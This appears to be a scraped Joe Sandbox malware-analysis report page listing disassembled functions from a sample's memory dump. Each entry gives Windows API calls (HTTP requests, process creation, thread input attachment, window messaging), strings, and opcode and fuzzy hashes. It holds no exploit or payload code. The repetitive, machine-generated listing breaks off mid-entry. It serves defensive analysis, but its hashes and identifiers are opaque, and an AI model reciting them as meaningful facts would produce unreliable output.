Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 259c3ff5ffe556d7e804e632ea14b092356ff6cc0b570b3afe3aefd157d285b6
Instruction ID: 36ef540184730bfef9a6b6361917769d79e6baa17954a74f0ce9e51d302a6cf6
Opcode Fuzzy Hash: 259c3ff5ffe556d7e804e632ea14b092356ff6cc0b570b3afe3aefd157d285b6
Instruction Fuzzy Hash: 75519F316406019FDB21AF64DC86B6AB7E4EF45710F0489B9F99ADB2A1DB30ED00DB42

Function 00B8B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00B8B4D0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00B8B546
GetLastError.KERNEL32 ref: 00B8B550
SetErrorMode.KERNEL32(00000000,READY), ref: 00B8B5BD

Strings

INVALID, xrefs: 00B8B58F
UNKNOWN, xrefs: 00B8B575
READONLY, xrefs: 00B8B588
READY, xrefs: 00B8B596
NOTREADY, xrefs: 00B8B57C

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 7425630942f2010db02a2b1d535b92bfeac96bde3334588f73eebdb40335f06d
Instruction ID: ff18f48f6c75febbba305be82e9e7858fa98ba990b852865e38f0a2ee3356483
Opcode Fuzzy Hash: 7425630942f2010db02a2b1d535b92bfeac96bde3334588f73eebdb40335f06d
Instruction Fuzzy Hash: E7318E35A00209AFCB10EBA8D895EFEBBF4EF19311F1441A6E505972A1DB719A42CB91

Function 00B78F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B27DE1: _memmove.LIBCMT ref: 00B27E22

Part of subcall function 00B7AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00B7AABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00B79014
GetDlgCtrlID.USER32 ref: 00B7901F
GetParent.USER32 ref: 00B7903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 00B7903E
GetDlgCtrlID.USER32(?), ref: 00B79047
GetParent.USER32(?), ref: 00B79063
SendMessageW.USER32(00000000,?,?,00000111), ref: 00B79066

Strings

ListBox, xrefs: 00B78FD1
ComboBox, xrefs: 00B78F9C

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 8ccca9b033bb7ad0fc155a25e1c5a2dbefa1303eb167e12bc6462509aca6acdc
Instruction ID: de35764c5c31279e949523733ef56f099ad1a6b051b938af137a846d1922e5b7
Opcode Fuzzy Hash: 8ccca9b033bb7ad0fc155a25e1c5a2dbefa1303eb167e12bc6462509aca6acdc
Instruction Fuzzy Hash: 07210370A00108BBDF14ABA4CC85EFEBBB8EF4A310F0041A6F925972B1EF354815DB20

Function 00B7907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B27DE1: _memmove.LIBCMT ref: 00B27E22

Part of subcall function 00B7AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00B7AABC

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00B790FD
GetDlgCtrlID.USER32 ref: 00B79108
GetParent.USER32 ref: 00B79124
SendMessageW.USER32(00000000,?,00000111,?), ref: 00B79127
GetDlgCtrlID.USER32(?), ref: 00B79130
GetParent.USER32(?), ref: 00B7914C
SendMessageW.USER32(00000000,?,?,00000111), ref: 00B7914F

Strings

ListBox, xrefs: 00B790BC
ComboBox, xrefs: 00B79087

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 7dbaae5ac0bc06c53378a27ff9bd8a097ad88b24b09015a40c959d4a875609e5
Instruction ID: 3cdd296b52626350349d0a796c82058e00a647402930cef38ab76cea084e02bc
Opcode Fuzzy Hash: 7dbaae5ac0bc06c53378a27ff9bd8a097ad88b24b09015a40c959d4a875609e5
Instruction Fuzzy Hash: 0321F574A40109BBDF10ABA4CC86EFEBBF8EF45300F004096F925972A1DF754815DB60

Function 00B79163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00B7916F
GetClassNameW.USER32(00000000,?,00000100), ref: 00B79184
_wcscmp.LIBCMT ref: 00B79196
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00B79211

Strings

largeicons, xrefs: 00B791A5
details, xrefs: 00B791BF
SHELLDLL_DefView, xrefs: 00B79190
smallicons, xrefs: 00B791D9
list, xrefs: 00B791F3

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: dfa3cf6193ce76a0306665db8d1076bb5590fb95aed523e801caceac974fb37e
Instruction ID: abbe12e3675b1363798567a401b99aa860ae26132331ea460f71ed952e53a5f8
Opcode Fuzzy Hash: dfa3cf6193ce76a0306665db8d1076bb5590fb95aed523e801caceac974fb37e
Instruction Fuzzy Hash: E01136372C8307BAFA103628DC1BDE777DCDB11720B2040E7F924E14E2FE61A9216984

Function 00B988AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B988D7
CoInitialize.OLE32(00000000), ref: 00B98904
CoUninitialize.OLE32 ref: 00B9890E
GetRunningObjectTable.OLE32(00000000,?), ref: 00B98A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00B98B3B
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00BB2C0C), ref: 00B98B6F
CoGetObject.OLE32(?,00000000,00BB2C0C,?), ref: 00B98B92
SetErrorMode.KERNEL32(00000000), ref: 00B98BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00B98C25
VariantClear.OLEAUT32(?), ref: 00B98C35

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 2e232f1c53a0f8837cffe8571f55b32ecde2804246cd58bcdea193bf467343e5
Instruction ID: c757addaf9f1b6ec6c93e35f2865baaf391618a9566990f97ce1a2f7217c4821
Opcode Fuzzy Hash: 2e232f1c53a0f8837cffe8571f55b32ecde2804246cd58bcdea193bf467343e5
Instruction Fuzzy Hash: B8C128B16083059FDB00DF64C88496BB7E9FF8A348F0449ADF58A9B261DB71ED05CB52

Function 00B87990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00B87A6C

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 8265e217b9e5d1c2c64dc406aade9ead60de74a7c491e00af4706769b11b35cf
Instruction ID: 84d5a7976c6e2f3d8c882fa87014bc148cf497d94c8d05547df713987c416611
Opcode Fuzzy Hash: 8265e217b9e5d1c2c64dc406aade9ead60de74a7c491e00af4706769b11b35cf
Instruction Fuzzy Hash: 16B19F7194421A9FDB00EFA4D885BBEBBF5EF09329F2444A9E501E7261DB34E941CF90

Function 00B811CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00B811F0
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00B80268,?,00000001), ref: 00B81204
GetWindowThreadProcessId.USER32(00000000), ref: 00B8120B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B80268,?,00000001), ref: 00B8121A
GetWindowThreadProcessId.USER32(?,00000000), ref: 00B8122C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B80268,?,00000001), ref: 00B81245
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B80268,?,00000001), ref: 00B81257
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00B80268,?,00000001), ref: 00B8129C
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00B80268,?,00000001), ref: 00B812B1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00B80268,?,00000001), ref: 00B812BC

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 77aecd2554e1eaa3ca599c0fe7d3e86dfc65fc563e6bdd0f93514f57b40975d7
Instruction ID: ec9f13940238036cee5b109691c91f4538ad757b0420cebb0968c307670936e0
Opcode Fuzzy Hash: 77aecd2554e1eaa3ca599c0fe7d3e86dfc65fc563e6bdd0f93514f57b40975d7
Instruction Fuzzy Hash: 3831AE75A01204EBDB60AF98EC89FB937EDEB66351F108559F901DB1B0DBB09D41CB90

Function 00B2FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00B2FAA6
OleUninitialize.OLE32(?,00000000), ref: 00B2FB45
UnregisterHotKey.USER32(?), ref: 00B2FC9C
DestroyWindow.USER32(?), ref: 00B645D6
FreeLibrary.KERNEL32(?), ref: 00B6463B
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00B64668

Strings

close all, xrefs: 00B2FAA1

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: a05079ac6c2cfacff227ee04a054fbda9658ff2ce2cdf5fb5c4e81cb2c91dbd9
Instruction ID: 61654b8ce52f1131abb6411b45cc065bce35f70a2382ba82812d668cfadcceb5
Opcode Fuzzy Hash: a05079ac6c2cfacff227ee04a054fbda9658ff2ce2cdf5fb5c4e81cb2c91dbd9
Instruction Fuzzy Hash: 4FA134317016228FCB29EF14D995A79B7E4EF16700F5442EDE80AAB261DB30AD56CF90

Function 00B7A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00B7A439), ref: 00B7A377

Strings

REGEXPCLASS, xrefs: 00B7A13C
CLASS, xrefs: 00B7A0F6
TEXT, xrefs: 00B7A2AE
INSTANCE, xrefs: 00B7A285
NAME, xrefs: 00B7A1A9
CLASSNN, xrefs: 00B7A119

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: b8607587c56be668993529d42ade9e5288a823f9e1c6388fefb00fea83b79720
Instruction ID: ec9a172e29d25a869a9fb0766d74a05de0b88691846aefe14af7b0a2ed392545
Opcode Fuzzy Hash: b8607587c56be668993529d42ade9e5288a823f9e1c6388fefb00fea83b79720
Instruction Fuzzy Hash: 5D91D331604606AACB48EFA0C491BEDFBF4FF44300F54C199E86DA3291DF316A99DB91

Function 00B22E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00B22EAE

Part of subcall function 00B21DB3: GetClientRect.USER32(?,?), ref: 00B21DDC
Part of subcall function 00B21DB3: GetWindowRect.USER32(?,?), ref: 00B21E1D
Part of subcall function 00B21DB3: ScreenToClient.USER32(?,?), ref: 00B21E45

GetDC.USER32 ref: 00B5CD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B5CD45
SelectObject.GDI32(00000000,00000000), ref: 00B5CD53
SelectObject.GDI32(00000000,00000000), ref: 00B5CD68
ReleaseDC.USER32(?,00000000), ref: 00B5CD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00B5CDFB

Strings

U, xrefs: 00B5CCD0

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: c59addea1c1b41ed51e68fd5f0c9f7fcfec83b6f3f63ed8fbf7d7243f16e424d
Instruction ID: 8bfae88b70c18caaf313c82f69bf6ca1f8c48d9341d9cecfb789c51134da4ad8
Opcode Fuzzy Hash: c59addea1c1b41ed51e68fd5f0c9f7fcfec83b6f3f63ed8fbf7d7243f16e424d
Instruction Fuzzy Hash: 2071AD31400205EFCF219F64C885ABA7FF6FF49325F1442FAED599A2A6C7309845DB60

Function 00B91A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B91A50
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00B91A7C
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00B91ABE
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00B91AD3
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B91AE0
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00B91B10
InternetCloseHandle.WININET(00000000), ref: 00B91B57

Part of subcall function 00B92483: GetLastError.KERNEL32(?,?,00B91817,00000000,00000000,00000001), ref: 00B92498
Part of subcall function 00B92483: SetEvent.KERNEL32(?,?,00B91817,00000000,00000000,00000001), ref: 00B924AD

Strings

, xrefs: 00B91B01

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: fd912e73d643de309c94aa02dc53f3ab5c1029aa100fcd74bfdb632419ba568c
Instruction ID: e7fabadad0033d6da2351062855f6988b5a229f298334acac0bafdb5bcc1009c
Opcode Fuzzy Hash: fd912e73d643de309c94aa02dc53f3ab5c1029aa100fcd74bfdb632419ba568c
Instruction Fuzzy Hash: 284171B190121ABFEF128F54CC86FFE7BADEF09354F004166FA059A151EB709E449BA0

Function 00B98C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00BAF910), ref: 00B98D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00BAF910), ref: 00B98D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00B98ED6
SysFreeString.OLEAUT32(?), ref: 00B98F00

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: b30dad592405fdd246cac9a0292026136432dd1ff5dc2aa003ff9ae8d9555d65
Instruction ID: 42eaa4cf7dad2edadd01a06035436c2460ef56da14cd4fbcaede2edcfde50bf0
Opcode Fuzzy Hash: b30dad592405fdd246cac9a0292026136432dd1ff5dc2aa003ff9ae8d9555d65
Instruction Fuzzy Hash: EFF11B71A00219EFDF14DF94C884EAEB7B9FF46314F1084A9F919AB251DB31AE45CB90

Function 00B9F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B9F6B5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B9F848
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B9F86C
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B9F8AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B9F8CE
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B9FA4A
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00B9FA7C
CloseHandle.KERNEL32(?), ref: 00B9FAAB
CloseHandle.KERNEL32(?), ref: 00B9FB22

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 91cf9a08fff0cb4db74ea24c0d9df661166ae8efe33035a44d6d8f90aca86deb
Instruction ID: 2dc18e0b1ac68ac5e023372b5a05d253ce47f38692344ce141957387749f9600
Opcode Fuzzy Hash: 91cf9a08fff0cb4db74ea24c0d9df661166ae8efe33035a44d6d8f90aca86deb
Instruction Fuzzy Hash: 7AE180316042029FCB14EF24D891B6ABBE1EF85364F1485BDF8999B2A1CB31DD45CB52

Function 00B84CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B8466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B83697,?), ref: 00B8468B

Part of subcall function 00B8466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B83697,?), ref: 00B846A4

Part of subcall function 00B84A31: GetFileAttributesW.KERNEL32(?,00B8370B), ref: 00B84A32

lstrcmpiW.KERNEL32(?,?), ref: 00B84D40
_wcscmp.LIBCMT ref: 00B84D5A
MoveFileW.KERNEL32(?,?), ref: 00B84D75

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: cb827be5b01c4f7b1f4b1bba6e8ba7095499ab11439b91708b2d47225e40d87e
Instruction ID: 84c1c8ef02d9e6be604961273fd4e58467545cb3840769e6fe032e3399a3c798
Opcode Fuzzy Hash: cb827be5b01c4f7b1f4b1bba6e8ba7095499ab11439b91708b2d47225e40d87e
Instruction Fuzzy Hash: E75176B24083459BC724EB94D8819DFB3ECEF85350F40096EF689D3161EF34A688C766

Function 00BA8645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00BA86FF

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 3311b7184741c0c0ee9ce9a307ea2555be8b55cd6f0f83ed74446e767e6f4e12
Instruction ID: f635a069f84f9cc378eb76b1f17ee05826e1503232cbe235ab494e03ec8bf07f
